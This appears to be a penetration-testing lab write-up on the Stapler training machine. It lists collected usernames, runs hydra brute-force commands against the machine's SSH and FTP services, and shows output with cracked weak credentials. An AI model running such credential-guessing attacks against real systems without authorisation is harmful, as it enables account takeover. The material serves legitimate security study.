InfoSec LAB

Stapler_Brute-Force_Attack

Created: 2 min read

Brute-Force Attack

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cat users.txt              
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
www
elly
john
harry
kathy
fred
Zoe
Tim
Barry
dave
Abby
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cat users.txt | wc -l

A total of 39 usernames have been collected from various sources, including FTP, Samba, Web servers and ZIP archive.

While no password is known at this time, i will attempt to perform a brute-force attack with hydra with the -e nsr flag to check for null password, username as password, and reversed username as password.

SSH

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ hydra -L users.txt -e nsr ssh://$IP -t 64      
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-28 22:17:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:37/p:3), ~2 tries per task
[DATA] attacking ssh://192.168.239.148:22/
[22][ssh] host: 192.168.239.148   login: SHayslett   password: SHayslett
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-28 22:18:24

Found a valid SSH credential for the SHayslett user; SHayslett

FTP

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ hydra -L users.txt -e nsr ftp://$IP -t 64 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-28 23:36:25
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:37/p:3), ~2 tries per task
[DATA] attacking ftp://192.168.239.148:21/
[21][ftp] host: 192.168.239.148   login: SHayslett   password: SHayslett
[21][ftp] host: 192.168.239.148   login: elly   password: ylle
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-28 23:36:37

Found 2 valid FTP credentials;

  • SHayslett:SHayslett
  • elly:ylle

Interactive Graph View

Backlinks